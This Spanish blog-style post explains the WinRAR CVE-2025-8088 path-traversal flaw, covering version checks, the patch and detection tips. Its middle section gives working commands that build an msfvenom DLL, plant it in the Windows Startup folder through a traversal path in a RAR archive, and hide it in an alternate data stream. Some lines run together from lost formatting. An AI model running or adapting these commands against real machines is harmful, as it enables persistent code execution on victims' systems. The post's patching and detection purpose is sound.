Un recorrido atractivo sobre cómo descubrir, parchear y asegurar WinRAR CVE-2025-8088 con un toque práctico de hacker.
WinRAR — el clásico polvoriento que todos tienen instalado pero nadie actualiza — acaba de recibir un zero-day de alta severidad: CVE-2025-8088.
CISA incluso metió esto en su catálogo de Vulnerabilidades Explotadas Conocidas, con una fecha límite de remediación el 2 de septiembre de 2025. Esto no es solo teoría — esto es fuego real.
..\Startup\evil.dllAfectados: WinRAR para Windows (≤7.12), UnRAR.dll, Portable UnRAR Seguros: Versiones para Linux, Unix, Android.
Antes de entrar en pánico o hacerte el hacker, verifica tu versión.
Ayuda → Acerca de WinRARwinget list WinRAR
(o ejecuta winrar.exe desde su directorio de instalación)
UnRAR.dll → Propiedades → Detalles.Cuando empecé a escribir esto, estaba en 7.10 — sí, listo para ser recolectado 🗿🐔🍗.
Ayuda → Acerca de WinRAR → debería mostrar 7.13 o superior.UnRAR.dll en herramientas dependientes, si las hay.WinRAR no se actualiza automáticamente — pon un recordatorio en el calendario, no te conviertas en un objetivo estático.
PD: Ignora mi flex de fondo de pantalla aquí — ¡tenía que presumir un poco! 😏
%TEMP% y de Inicio.⚠ Advertencia: Esto es solo para pruebas de seguridad educativas y autorizadas. No te pongas en modo gremlin total 🗿.
msfvenom -p windows/x64/exec CMD=calc.exe -f dll > evil.dll
winrar a -ep -ap"\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" payload.rar evil.dll
type evil.dll > legit.txt:evil.dll
Boom — evil.dll termina en Inicio. ¿Siguiente reinicio? Hola calc.exe.
Parche → WinRAR 7.13+
Busca .dll o .lnk sospechosos en:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup%TEMP%Monitorea ADS:
streams.exe -s C:\
Regla IDS/IPS: marcar RAR con secuencias ..\.
Los plugins de Nessus/Qualys ya están disponibles.
Esto no fue una vuln de “tal vez algún día” — esto fue armamentizado antes de la divulgación. Si todavía estás en 7.10 (como yo cuando escribí esto), parchea ahora. Si estás del lado del equipo rojo, trata esto como un caso de estudio de cómo las herramientas viejas se convierten en nuevos vectores de ataque.